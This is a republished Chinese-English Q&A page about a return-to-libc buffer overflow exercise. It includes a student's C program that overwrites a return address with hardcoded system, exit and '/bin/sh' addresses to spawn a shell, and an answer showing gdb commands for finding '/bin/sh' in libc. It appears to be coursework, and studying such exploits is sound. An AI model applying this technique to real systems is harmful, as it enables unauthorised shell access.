返回lib_c缓冲区溢出练习问题 [英] return to lib_c buffer overflow exercise issue
问题描述
我应该提出一个利用返回libc缓冲区溢出"的程序.这是在执行时干净地退出并显示SHELL提示.该程序在bash终端中执行.下面是我的C代码:
I'm supposed to come up with a program that exploits the "return to libc buffer overflow". This is, when executed, it cleanly exits and brings up a SHELL prompt. The program is executed in a bash terminal. Below is my C code:
#include <stdio.h>
int main(int argc, char*argv[]){
char buffer[7];
char buf[42];
int i = 0;
while(i < 28)
{
buf[i] = 'a';
i = i + 1;
}
*(int *)&buf[28] = 0x4c4ab0;
*(int *)&buf[32] = 0x4ba520;
*(int *)&buf[36] = 0xbfffff13;
strcpy(buffer, buf);
return 0;
}
使用 gdb ,我已经能够确定以下内容:
Using gdb, I've been able to determine the following:
- 系统"的地址:0x4c4ab0
- 出口"的地址:0x4ba520
- 字符串"/bin/sh"驻留在内存中:0xbfffff13
我还知道,使用 gdb ,在我的缓冲区变量中插入32个"A"会覆盖返回地址.因此,假设系统调用为4个字节,那么我首先将内存泄漏"填充为28个字节.在第28个字节处,我开始系统调用,然后退出调用,最后添加我的"/bin/sh"存储位置.
I also know, using gdb, that inserting 32 "A"'s into my buffer variable will overwrite the return address. So given that the system call is 4 bytes, I start by filling in my memory "leak" at 28 bytes. At the 28th byte, I begin my system call, then exit call, and finally add my "/bin/sh" memory location.
但是,当我运行该程序时,我得到以下信息:
When I run the program, however, I get the following:
sh: B���: command not found
Segmentation fault (core dumped)
我真的不确定我做错了什么...
I'm really not sure what I'm doing wrong...
:通过导出环境变量,我能够获得字符串"/bin/sh":
: I was able to get the string "/bin/sh" by exporting a environmental variable:
export MYSHELL="/bin/sh"
推荐答案
您可以在libc中搜索/bin/sh字符串的固定地址.然后在gdb中运行程序:
You can search in libc for a fixed address of a /bin/sh string. Run you program in gdb then:
> (gdb) break main
>
> (gdb) run
>
> (gdb) print &system
> $1 = (<text variable, no debug info>*) 0xf7e68250 <system>
>
> (gdb) find &system,+9999999,"/bin/sh"
> 0xf7f86c4c
> warning: Unable to access target memory at 0xf7fd0fd4, halting search.
> 1 pattern found.
祝你好运.
这篇关于返回lib_c缓冲区溢出练习问题的文章就介绍到这了,希望我们推荐的答案对大家有所帮助,也希望大家多多支持IT屋!